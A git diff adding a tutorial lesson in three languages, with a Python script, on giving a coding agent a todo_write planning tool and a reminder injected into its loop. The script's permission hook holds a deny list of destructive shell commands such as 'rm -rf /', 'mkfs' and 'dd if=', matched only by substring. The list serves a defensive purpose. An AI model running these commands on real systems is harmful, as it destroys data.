+ +The longer the conversation, the worse it gets: tool results keep filling the context, diluting the system prompt's influence. A 10-step refactoring: after steps 1-3, the Agent starts improvising because steps 4-10 have been pushed out of its attention. + +--- + +## The Solution + +![Todo Overview](images/todo-overview.en.svg) + +The s04 loop and hooks are fully preserved. The only change is registering one more tool in TOOL_HANDLERS: `todo_write`. It does no actual work — can't read files, can't run commands — it simply lets the Agent organize its thoughts before diving in. + +The loop doesn't change. The new tool is automatically dispatched through `TOOL_HANDLERS[block.name]`. + +--- + +## How It Works + +**The todo_write tool** — accepts a list with statuses, persists to disk, and displays progress in the terminal: + +```python +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + + lines = ["\n## Current Tasks"] + for t in todos: + icon = {"pending": " ", "in_progress": "▸", "completed": "✓"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" +``` + +The tool definition joins the other 5 in the dispatch map: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + # s05: new entry + {"name": "todo_write", "description": "Create and manage a task list ...", + "input_schema": { + "type": "object", + "properties": { + "todos": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": {"type": "string"}, + "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}, + }, + }, + }, + }, + }, + }, +] + +TOOL_HANDLERS["todo_write"] = run_todo_write +``` + +**Nag reminder** — when the model hasn't called `todo_write` for 3 consecutive 
rounds, a reminder is automatically injected: + +```python +if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) +``` + +Typical flow when the Agent receives a task: first call `todo_write` to list all steps (all `pending`) → pick one step, set it to `in_progress` → complete it, set to `completed` → look at the next `pending` → continue. Haven't updated in 3 rounds? The nag reminder chases it down. + +**Key insight**: todo_write doesn't give the Agent any additional **execution capability**. What it adds is **planning capability**. + +--- + +## Changes from s04 + +| Component | Before (s04) | After (s05) | +|-----------|-------------|-------------| +| Tool count | 5 (bash, read, write, edit, glob) | 6 (+todo_write) | +| Planning | None | Stateful TODO list + nag reminder | +| SYSTEM prompt | Generic prompt | Added "plan before executing" guidance | +| Loop | Unchanged | Unchanged (new tool auto-dispatched) | + +--- + +## Try It + +```sh +cd learn-claude-code +python s05_todo_write/code.py +``` + +Try these prompts: + +1. `Refactor the file hello.py: add type hints, docstrings, and a main guard` (should list 3 steps first, then execute) +2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py` +3. `Review all Python files and fix any style issues` + +What to watch for: Did the Agent call `todo_write` first? How many steps did it list? Did it go back to update TODO status during execution? Did the nag reminder appear after 3 rounds without updates? + +--- + +## What's Next + +The Agent can plan now. But if a task is too large — say "refactor the entire auth module" — a TODO list alone isn't enough. That task is itself a collection of dozens of subtasks that would drown in a single conversation's context. 
+ +→ s06 Subagent: Break large tasks into subtasks, each handled by an independent Agent with its own clean context — no cross-contamination. + +
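
The lifecycle from the walkthrough above (list everything as `pending`, pick one up as `in_progress`, mark it `completed`, move on) can be replayed against a stripped-down handler. This version drops the disk write from `run_todo_write` and just renders the checklist:

```python
def render_todos(todos: list) -> str:
    """Stripped-down todo_write: render the checklist, skip the disk write."""
    icons = {"pending": " ", "in_progress": "▸", "completed": "✓"}
    lines = ["## Current Tasks"]
    for t in todos:
        lines.append(f" [{icons[t['status']]}] {t['content']}")
    return "\n".join(lines)

# Step 1: the Agent lists every step, then picks the first one up
todos = [
    {"content": "rename files to snake_case", "status": "in_progress"},
    {"content": "run tests", "status": "pending"},
    {"content": "fix failures", "status": "pending"},
]
print(render_todos(todos))

# Step 2: first step done, move to the next pending item
todos[0]["status"] = "completed"
todos[1]["status"] = "in_progress"
print(render_todos(todos))
```

Nothing here executes anything; the value is entirely in the rendered state the model (and you) see every round.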
+Dive into CC Source Code + +CC has two task systems coexisting (`tasks.ts:133`): + +- **TodoWrite (V1)**: Default in interactive sessions. A simple list tool, data lives in memory. +- **Task System (V2 = s12)**: Default in non-interactive sessions (SDK). File-persisted, dependency graph, concurrency locks, ownership. + +The switch is controlled by `isTodoV2Enabled()`: enabled when the `CLAUDE_CODE_ENABLE_TASKS` environment variable is set or in non-interactive sessions. + +They're not replacements — they **coexist**. In interactive scenarios, the Agent uses TodoWrite for quick checklists; in SDK/multi-Agent scenarios, it uses the Task System for structured task management. The teaching version covers TodoWrite first (simpler concept) then the Task System (s12), following the progressive principle from simple to complex. + +Core increments of the Task System over TodoWrite: +- File persistence (`.tasks/{id}.json`) instead of in-memory list +- `blockedBy` dependency graph instead of flat list +- `proper-lockfile` concurrency safety instead of no locking +- Four separate tools (Create/Get/Update/List) instead of one +- Lifecycle hooks (TaskCreated/TaskCompleted) for external system integration + +
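
The gate described above can be sketched in a couple of lines. The real implementation is TypeScript; the Python below only mirrors the description, and the exact truthiness rule for the env var is an assumption:

```python
import os

def is_todo_v2_enabled(interactive: bool) -> bool:
    # Task System (V2) when CLAUDE_CODE_ENABLE_TASKS is set,
    # or when the session is non-interactive (SDK)
    return bool(os.environ.get("CLAUDE_CODE_ENABLE_TASKS")) or not interactive
```

In CC this decides which task tools get registered at startup; the teaching version hard-codes TodoWrite (V1) here and introduces the Task System separately in s12.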
+ + diff --git a/s05_todo_write/README.ja.md b/s05_todo_write/README.ja.md new file mode 100644 index 000000000..a47242c3a --- /dev/null +++ b/s05_todo_write/README.ja.md @@ -0,0 +1,155 @@ +# s05: TodoWrite — 計画なき Agent は途中で道を外れる + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → `s05` → [s06](../s06_subagent/) → s07 → ... → s19 + +> *"計画なき agent は風の向くままに"* — まず手順を列挙してから実行。完了率が倍増する。 +> +> **Harness レイヤー**: 計画 — Agent が行動する前に考えさせる。 + +--- + +## 課題 + +Agent に複雑なタスクを与える:「全 Python ファイルを snake_case にリネームし、テストを実行し、失敗を修正して。」 + +Agent は作業を開始する — 3 つのファイルをリネーム、テストを実行、2 つの失敗を発見、修正を開始。修正しているうちに、本来の目的が「snake_case にリネーム」だったことを忘れる — テストの失敗に注意を全て持っていかれる。 + +会話が長くなるほど悪化する:ツールの結果がコンテキストを埋め続け、システムプロンプトの影響力が希釈される。10 ステップのリファクタリング:ステップ 1-3 を終えた時点で Agent は即興で動き始める。ステップ 4-10 は既に注意の外に追い出されているから。 + +--- + +## ソリューション + +![Todo Overview](images/todo-overview.ja.svg) + +s04 のループとフックは完全に保持される。唯一の変更は TOOL_HANDLERS にもう一つツールを登録すること:`todo_write`。これは実際の作業を何もしない — ファイルを読めない、コマンドを実行できない — Agent が手を動かす前に思考を整理できるようにするだけ。 + +ループは変わらない。新しいツールは `TOOL_HANDLERS[block.name]` を通じて自動的にディスパッチされる。 + +--- + +## 仕組み + +**todo_write ツール** — ステータス付きのリストを受け取り、ディスクに永続化し、端末に進捗を表示する: + +```python +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + + lines = ["\n## Current Tasks"] + for t in todos: + icon = {"pending": " ", "in_progress": "▸", "completed": "✓"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" +``` + +ツール定義は他の 5 つと一緒にディスパッチマップに追加される: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + # s05: 新規追加 + {"name": "todo_write", "description": "Create and manage a task list ...", + "input_schema": { + "type": "object", + "properties": { + "todos": { + "type": "array", + 
"items": { + "type": "object", + "properties": { + "content": {"type": "string"}, + "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}, + }, + }, + }, + }, + }, + }, +] + +TOOL_HANDLERS["todo_write"] = run_todo_write +``` + +**Nag リマインダー** — モデルが連続 3 ラウンド `todo_write` を呼び出さないとき、リマインダーが自動的に注入される: + +```python +if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) +``` + +Agent がタスクを受け取った後の典型的な流れ:まず `todo_write` を呼び出して全手順を列挙(全て `pending`)→ 一つの手順に取り掛かり、`in_progress` に変更 → 完了したら `completed` に変更 → 次の `pending` を見る → 続行。3 ラウンド更新なし? Nag リマインダーが追いかけてくる。 + +**重要な洞察**:todo_write は Agent に**実行能力**を何も追加しない。追加するのは**計画能力**だ。 + +--- + +## s04 からの変更 + +| コンポーネント | 変更前 (s04) | 変更後 (s05) | +|--------------|-------------|-------------| +| ツール数 | 5 (bash, read, write, edit, glob) | 6 (+todo_write) | +| 計画能力 | なし | ステータス付き TODO リスト + Nag リマインダー | +| SYSTEM プロンプト | 汎用プロンプト | 「先に計画してから実行」のガイダンスを追加 | +| ループ | 不変 | 不変(新ツールは自動ディスパッチ) | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s05_todo_write/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`(まず 3 手順を列挙してから実行するはず) +2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py` +3. `Review all Python files and fix any style issues` + +観察のポイント:Agent はまず `todo_write` を呼び出したか? 何手順列挙したか? 実行中に TODO のステータスを更新し戻ったか? 3 ラウンド更新なしで Nag リマインダーが表示されたか? + +--- + +## 次へ + +Agent は計画できるようになった。しかしタスクが大きすぎる場合 — 例えば「認証モジュール全体をリファクタリング」— TODO リストだけでは不十分。そのタスク自体が数十のサブタスクの集合体で、同じ会話のコンテキストに押し込めると溢れてしまう。 + +→ s06 Subagent:大きなタスクをサブタスクに分割し、それぞれを独立した Agent に任せる。それぞれが独自のクリーンなコンテキストを持ち、相互汚染がない。 + +
+CC ソースコードを深掘り + +CC には二つのタスクシステムが共存している(`tasks.ts:133`): + +- **TodoWrite(V1)**:対話型セッションでデフォルト使用。シンプルなリストツール、データはメモリ内 +- **Task System(V2 = s12)**:非対話型セッション(SDK)でデフォルト使用。ファイル永続化、依存グラフ、並行ロック、ownership + +切り替えは `isTodoV2Enabled()` で制御:`CLAUDE_CODE_ENABLE_TASKS` 環境変数が設定されているか、非対話型セッションの場合に V2 が有効になる。 + +両者は置き換え関係ではなく **共存関係**。対話型シナリオでは Agent が TodoWrite で素早くチェックリストを作成し、SDK/マルチエージェントシナリオでは Task System で構造化されたタスク管理を行う。教育版はまず TodoWrite を(概念がシンプル)次に Task System(s12)を取り上げる、簡単から複雑への段階的原則に従う。 + +Task System の TodoWrite に対する核心的な増分: +- メモリリストではなくファイル永続化(`.tasks/{id}.json`) +- 平坦なリストではなく `blockedBy` 依存グラフ +- ロックなしではなく `proper-lockfile` による並行安全性 +- 一つのツールではなく四つの独立ツール(Create/Get/Update/List) +- 外部システム統合のためのライフサイクルフック(TaskCreated/TaskCompleted) + +
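
上記の切り替えロジックは数行でスケッチできる。実際の実装は TypeScript であり、以下の Python は上の説明をなぞった仮のもの(環境変数の真偽判定の詳細は仮定):

```python
import os

def is_todo_v2_enabled(interactive: bool) -> bool:
    # CLAUDE_CODE_ENABLE_TASKS が設定されているか、
    # 非対話型セッション(SDK)なら Task System(V2)
    return bool(os.environ.get("CLAUDE_CODE_ENABLE_TASKS")) or not interactive
```

CC ではこの判定が起動時にどのタスクツールを登録するかを決める。教育版はここで TodoWrite(V1)を固定し、Task System は s12 で別途扱う。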
+ + diff --git a/s05_todo_write/README.md b/s05_todo_write/README.md new file mode 100644 index 000000000..170fb02f8 --- /dev/null +++ b/s05_todo_write/README.md @@ -0,0 +1,155 @@ +# s05: TodoWrite — 没有计划的 Agent,做着做着就偏了 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → `s05` → [s06](../s06_subagent/) → s07 → ... → s19 + +> *"没有计划的 agent 走哪算哪"* — 先列步骤再动手, 完成率翻倍。 +> +> **Harness 层**: 规划 — 让 Agent 在动手之前先想清楚。 + +--- + +## 问题 + +给 Agent 一个复杂任务:"把所有 Python 文件改成 snake_case 命名,然后跑测试,修好失败。" + +Agent 开始干活——改了 3 个文件,跑了个测试,发现 2 个失败,开始修。修着修着,它忘了最初是"改成 snake_case"——测试失败把注意力全吸走了。 + +对话越长越严重:工具结果不断填满上下文,系统提示的影响力被稀释。一个 10 步重构,做完 1-3 步就开始即兴发挥,因为 4-10 步已经被挤出注意力了。 + +--- + +## 解决方案 + +![Todo Overview](images/todo-overview.svg) + +s04 的循环和钩子完全保留。唯一的变化是在 TOOL_HANDLERS 里多注册一个工具:`todo_write`。它本身不做任何实际工作——不能读文件、不能跑命令——只是让 Agent 在动手之前先理清思路。 + +循环一行不改。新工具自动通过 `TOOL_HANDLERS[block.name]` 分发。 + +--- + +## 工作原理 + +**todo_write 工具**——接收一个带状态的列表,持久化到磁盘,同时在终端显示进度: + +```python +def run_todo_write(todos: list) -> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + + lines = ["\n## Current Tasks"] + for t in todos: + icon = {"pending": " ", "in_progress": "▸", "completed": "✓"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" +``` + +工具定义和其他 5 个工具一起加入 dispatch map: + +```python +TOOLS = [ + {"name": "bash", ...}, + {"name": "read_file", ...}, + {"name": "write_file", ...}, + {"name": "edit_file", ...}, + {"name": "glob", ...}, + # s05: 新增一条 + {"name": "todo_write", "description": "Create and manage a task list ...", + "input_schema": { + "type": "object", + "properties": { + "todos": { + "type": "array", + "items": { + "type": "object", + "properties": { + "content": {"type": "string"}, + "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}, + }, + }, + }, + }, + }, + }, +] + 
+TOOL_HANDLERS["todo_write"] = run_todo_write +``` + +**Nag reminder**——模型连续 3 轮没调 `todo_write` 时,自动注入一条提醒: + +```python +if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) +``` + +Agent 收到任务后的典型流程:先调 `todo_write` 列出所有步骤(全 `pending`)→ 做一个步骤,改成 `in_progress` → 做完改成 `completed` → 看下一个 `pending` → 继续。3 轮不更新?nag reminder 追着它问。 + +**关键洞察**:todo_write 不给 Agent 增加任何**执行能力**。它增加的是**规划能力**。 + +--- + +## 相对 s04 的变更 + +| 组件 | 之前 (s04) | 之后 (s05) | +|------|-----------|-----------| +| 工具数量 | 5 (bash, read, write, edit, glob) | 6 (+todo_write) | +| 规划能力 | 无 | 带状态的 TODO 列表 + nag reminder | +| SYSTEM 提示 | 通用提示 | 加入 "先计划再执行" 引导 | +| 循环 | 不变 | 不变(新工具自动分发) | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s05_todo_write/code.py +``` + +试试这些 prompt: + +1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`(先列 3 步再执行) +2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py` +3. `Review all Python files and fix any style issues` + +观察重点:Agent 先调了 `todo_write` 吗?它列了几个步骤?执行过程中有没有回头更新 TODO 状态?连续 3 轮不更新时是否出现了 nag reminder? + +--- + +## 接下来 + +Agent 能计划了。但如果一个任务太大——比如"重构整个认证模块"——光靠 TODO 列表不够。这个任务本身就是几十个小任务的集合,放在同一个对话里会被上下文淹没。 + +s06 Subagent → 把大任务拆成子任务,每个子任务派一个独立的 Agent。它们有自己的干净上下文,不会互相污染。 + +
+深入 CC 源码 + +CC 中有两套任务系统并存(`tasks.ts:133`): + +- **TodoWrite(V1)**:交互式会话中默认使用。一个简单的列表工具,数据在内存中 +- **Task System(V2 = s12)**:非交互式会话(SDK)中默认使用。文件持久化、依赖图、并发锁、ownership + +切换由 `isTodoV2Enabled()` 控制:设置了 `CLAUDE_CODE_ENABLE_TASKS` 环境变量或非交互式会话时启用 V2。 + +两者不是取代关系——是**并存关系**。交互式场景下 Agent 用 TodoWrite 快速列清单,SDK/多 Agent 场景下用 Task System 做结构化任务管理。教学版先讲 TodoWrite(概念简单)再讲 Task System(s12),符合从简单到复杂的渐进原则。 + +Task System 相比 TodoWrite 的核心增量: +- 文件持久化(`.tasks/{id}.json`)而非内存列表 +- `blockedBy` 依赖图而非平铺列表 +- `proper-lockfile` 并发安全而非无锁 +- 四个独立工具(Create/Get/Update/List)而非一个 +- 生命周期 hooks(TaskCreated/TaskCompleted)供外部系统集成 + +
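
上面描述的切换逻辑可以用几行 Python 勾勒出来。真实实现是 TypeScript,下面的函数名和行为只是按上文描述做的示意(环境变量的真值判断细节属于假设):

```python
import os

def is_todo_v2_enabled(interactive: bool) -> bool:
    # 设置了 CLAUDE_CODE_ENABLE_TASKS 环境变量,
    # 或处于非交互式会话(SDK)时,启用 Task System(V2)
    return bool(os.environ.get("CLAUDE_CODE_ENABLE_TASKS")) or not interactive
```

在 CC 中,这个判断决定启动时注册哪套任务工具;教学版在这里固定使用 TodoWrite(V1),Task System 留到 s12 单独讲。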
+ + diff --git a/s05_todo_write/code.py b/s05_todo_write/code.py new file mode 100644 index 000000000..620d0fa66 --- /dev/null +++ b/s05_todo_write/code.py @@ -0,0 +1,281 @@ +#!/usr/bin/env python3 +""" +s05: TodoWrite — add a planning tool on top of s04 hooks. + + +---------+ +-------+ +------------------+ + | User | ---> | LLM | ---> | TOOL_HANDLERS | + | prompt | | | | bash | + +---------+ +---+---+ | read_file | + ^ | write_file | + | result | edit_file | + +---------+ glob | + todo_write ← NEW + +------------------+ + | + .tasks/current_todos.json + | + if rounds_since_todo >= 3: + inject + +Changes from s04: + + todo_write tool + run_todo_write() implementation + + Nag reminder (inject reminder after 3 rounds without todo update) + + SYSTEM prompt includes "plan before execute" guidance + + rounds_since_todo counter in agent_loop + Loop unchanged: new tool auto-dispatches via TOOL_HANDLERS. + +Run: python s05_todo_write/code.py +Needs: pip install anthropic python-dotenv + ANTHROPIC_API_KEY in .env +""" + +import os, subprocess, json +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +TASKS_DIR = WORKDIR / ".tasks"; TASKS_DIR.mkdir(exist_ok=True) +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# s05 change: SYSTEM prompt adds planning guidance +SYSTEM = ( + f"You are a coding agent at {WORKDIR}. " + "Before starting any multi-step task, use todo_write to plan your steps. " + "Update status as you go." 
+) + + +# ═══════════════════════════════════════════════════════════ +# FROM s02-s04 (unchanged): Tool Implementations +# ═══════════════════════════════════════════════════════════ + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + +def run_edit(path: str, old_text: str, new_text: str) -> str: + try: + file_path = safe_path(path) + text = file_path.read_text() + if old_text not in text: + return f"Error: text not found in {path}" + file_path.write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + except Exception as e: + return f"Error: {e}" + +def run_glob(pattern: str) -> str: + import glob as g + try: + results = g.glob(pattern, root_dir=WORKDIR) + return "\n".join(results) if results else "(no matches)" + except Exception as e: + return f"Error: {e}" + + +# ═══════════════════════════════════════════════════════════ +# NEW in s05: todo_write tool — plan only, no execution +# ═══════════════════════════════════════════════════════════ + +def run_todo_write(todos: list) 
-> str: + tasks_file = TASKS_DIR / "current_todos.json" + tasks_file.write_text(json.dumps(todos, indent=2, ensure_ascii=False)) + lines = ["\n\033[33m## Current Tasks\033[0m"] + for t in todos: + icon = {"pending": " ", "in_progress": "\033[36m▸\033[0m", "completed": "\033[32m✓\033[0m"}[t["status"]] + lines.append(f" [{icon}] {t['content']}") + print("\n".join(lines)) + return f"Updated {len(todos)} tasks" + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", "properties": {"command": {"type": "string"}}, "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "limit": {"type": "integer"}}, "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "content": {"type": "string"}}, "required": ["path", "content"]}}, + {"name": "edit_file", "description": "Replace exact text in a file once.", + "input_schema": {"type": "object", "properties": {"path": {"type": "string"}, "old_text": {"type": "string"}, "new_text": {"type": "string"}}, "required": ["path", "old_text", "new_text"]}}, + {"name": "glob", "description": "Find files matching a glob pattern.", + "input_schema": {"type": "object", "properties": {"pattern": {"type": "string"}}, "required": ["pattern"]}}, + # s05: new tool + {"name": "todo_write", "description": "Create and manage a task list for your current coding session.", + "input_schema": {"type": "object", "properties": {"todos": {"type": "array", "items": {"type": "object", "properties": {"content": {"type": "string"}, "status": {"type": "string", "enum": ["pending", "in_progress", "completed"]}}}}}}}, +] + +TOOL_HANDLERS = { + "bash": run_bash, "read_file": run_read, "write_file": run_write, + "edit_file": run_edit, "glob": run_glob, "todo_write": run_todo_write, +} + + +# 
═══════════════════════════════════════════════════════════ +# FROM s04 (unchanged): Hook System +# ═══════════════════════════════════════════════════════════ + +HOOKS = {"UserPromptSubmit": [], "PreToolUse": [], "PostToolUse": [], "Stop": []} + +def register_hook(event: str, callback): + HOOKS[event].append(callback) + +def trigger_hooks(event: str, *args): + for callback in HOOKS[event]: + result = callback(*args) + if result is not None: + return result + return None + +# s04 hooks preserved +DENY_LIST = ["rm -rf /", "sudo", "shutdown", "reboot", "mkfs", "dd if="] + +def permission_hook(block): + """PreToolUse: deny list check.""" + if block.name == "bash": + for p in DENY_LIST: + if p in block.input.get("command", ""): + print(f"\n\033[31m⛔ Blocked: '{p}'\033[0m") + return "Permission denied" + return None + +def log_hook(block): + """PreToolUse: log tool calls.""" + print(f"\033[90m[HOOK] {block.name}\033[0m") + return None + +def context_inject_hook(query: str): + """UserPromptSubmit: log working directory.""" + print(f"\033[90m[HOOK] UserPromptSubmit: working in {WORKDIR}\033[0m") + return None + +def summary_hook(messages: list): + """Stop: print tool call count.""" + tool_count = sum(1 for m in messages + for b in (m.get("content") if isinstance(m.get("content"), list) else []) + if isinstance(b, dict) and b.get("type") == "tool_result") + print(f"\033[90m[HOOK] Stop: session used {tool_count} tool calls\033[0m") + return None + +register_hook("UserPromptSubmit", context_inject_hook) +register_hook("PreToolUse", permission_hook) +register_hook("PreToolUse", log_hook) +register_hook("Stop", summary_hook) + + +# ═══════════════════════════════════════════════════════════ +# agent_loop — same as s04 + nag reminder counter +# ═══════════════════════════════════════════════════════════ + +rounds_since_todo = 0 + +def agent_loop(messages: list): + global rounds_since_todo + while True: + # s05: nag reminder — inject if model hasn't updated todos for 3 rounds + 
if rounds_since_todo >= 3 and messages: + last = messages[-1] + if last["role"] == "user" and isinstance(last.get("content"), list): + last["content"].insert(0, { + "type": "text", + "text": "Update your todos.", + }) + + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + force = trigger_hooks("Stop", messages) + if force: + messages.append({"role": "user", "content": force}) + continue + return + + rounds_since_todo += 1 + results = [] + for block in response.content: + if block.type != "tool_use": + continue + + blocked = trigger_hooks("PreToolUse", block) + if blocked: + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": str(blocked)}) + continue + + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + + trigger_hooks("PostToolUse", block, output) + + # s05: reset nag counter when todo_write is called + if block.name == "todo_write": + rounds_since_todo = 0 + + results.append({"type": "tool_result", "tool_use_id": block.id, + "content": output}) + + messages.append({"role": "user", "content": results}) + + +if __name__ == "__main__": + print("s05: TodoWrite — plan before execute, nag if you forget") + print("Type a question, press Enter. 
Type q to quit.\n") + + history = [] + while True: + try: + query = input("\033[36ms05 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + trigger_hooks("UserPromptSubmit", query) + history.append({"role": "user", "content": query}) + agent_loop(history) + for block in history[-1]["content"]: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s05_todo_write/images/todo-overview.en.svg b/s05_todo_write/images/todo-overview.en.svg new file mode 100644 index 000000000..15bed37ab --- /dev/null +++ b/s05_todo_write/images/todo-overview.en.svg @@ -0,0 +1,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + TodoWrite — Loop Unchanged, One More Tool Auto-Dispatched + + + s04 Preserved + + + + messages[] + + + + + + + LLM + stop_reason? + + + + No + + Return Result + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + s05 New + + + + TOOL_HANDLERS + + + + bash · read · write + + + edit · glob + + + + todo_write + + → .tasks/current_todos.json + + + + Results appended to messages[], loop continues + + + + Nag Reminder + Model hasn't called todo_write for 3 rounds → auto-inject <reminder>Update your todos.</reminder> + + + + + s04 Preserved (loop, hooks, 5 base tools) + + s05 New (todo_write + nag reminder) + diff --git a/s05_todo_write/images/todo-overview.ja.svg b/s05_todo_write/images/todo-overview.ja.svg new file mode 100644 index 000000000..596bcf447 --- /dev/null +++ b/s05_todo_write/images/todo-overview.ja.svg @@ -0,0 +1,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + TodoWrite — ループ不変、ツール一つ追加で自動ディスパッチ + + + s04 保持 + + + + messages[] + + + + + + + LLM + stop_reason? 
+ + + + No + + 結果を返す + + + + Yes + + + + trigger_hooks + PreToolUse + + + + + + s05 新規 + + + + TOOL_HANDLERS + + + + bash · read · write + + + edit · glob + + + + todo_write + + → .tasks/current_todos.json + + + + 結果を messages[] に追加、ループ継続 + + + + Nag リマインダー(催促機構) + モデルが連続 3 ラウンド todo_write 未呼び出し → 自動注入 <reminder>Update your todos.</reminder> + + + + + s04 保持(ループ、フック、5 つの基本ツール) + + s05 新規(todo_write + Nag リマインダー) + diff --git a/s05_todo_write/images/todo-overview.svg b/s05_todo_write/images/todo-overview.svg new file mode 100644 index 000000000..81a28c434 --- /dev/null +++ b/s05_todo_write/images/todo-overview.svg @@ -0,0 +1,94 @@ + + + + + + + + + + + + + + + + + + + + + + + + TodoWrite — 循环不变,多一个工具自动分发 + + + s04 保留 + + + + messages[] + + + + + + + LLM + stop_reason? + + + + + + 返回结果 + + + + + + + + trigger_hooks + PreToolUse + + + + + + s05 新增 + + + + TOOL_HANDLERS + + + + bash · read · write + + + edit · glob + + + + todo_write + + → .tasks/current_todos.json + + + + 结果追加到 messages[],循环继续 + + + + Nag Reminder(催更机制) + 模型连续 3 轮没调 todo_write → 自动注入 <reminder>Update your todos.</reminder> + + + + + s04 保留(循环、钩子、5 个基础工具) + + s05 新增(todo_write + nag reminder) + diff --git a/s06_subagent/README.en.md b/s06_subagent/README.en.md new file mode 100644 index 000000000..bea7eaa26 --- /dev/null +++ b/s06_subagent/README.en.md @@ -0,0 +1,188 @@ +# s06: Subagent — Break Large Tasks into Small Ones with Clean Context + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → s02 → s03 → s04 → s05 → `s06` → [s07](../s07_skill_loading/) → s08 → ... → s19 + +> *"Break large tasks small, each with clean context"* — Subagent uses an independent messages[], no pollution in the main conversation. +> +> **Harness Layer**: Sub-Agent — Context isolation, attention doesn't drift. + +--- + +## The Problem + +The Agent is fixing a bug. It reads 30 files to trace the call chain, chatting for 60 rounds along the way. 
The messages list grows to 120 entries, most of which are intermediate steps from "tracing the call chain" — unrelated to the final goal of "fixing the bug." + +These intermediate steps occupy context space, making the Agent increasingly "forgetful" — it can no longer remember what the original problem was. + +Think of it differently: when you fix a bug, you'd "open a new terminal" to trace the call chain. When done, close the terminal, write the result into your notes, and return to the original terminal to keep fixing. The Agent needs this ability too — **open an independent sub-process, give it an independent message list, let it focus on one thing.** + +--- + +## The Solution + +![Subagent Overview](images/subagent-overview.en.svg) + +The s05 loop, hooks, and TODO system are fully preserved. The only change is registering one more tool in TOOL_HANDLERS: `task`. When called, it spawns a sub-Agent — with a fresh `messages[]`, running its own loop, and returning only a summary text to the main Agent. All intermediate steps are discarded. + +The sub-Agent's tools are restricted: it has bash/read/write/edit/glob, but **no task** — recursive spawning of grandchild Agents is forbidden. 
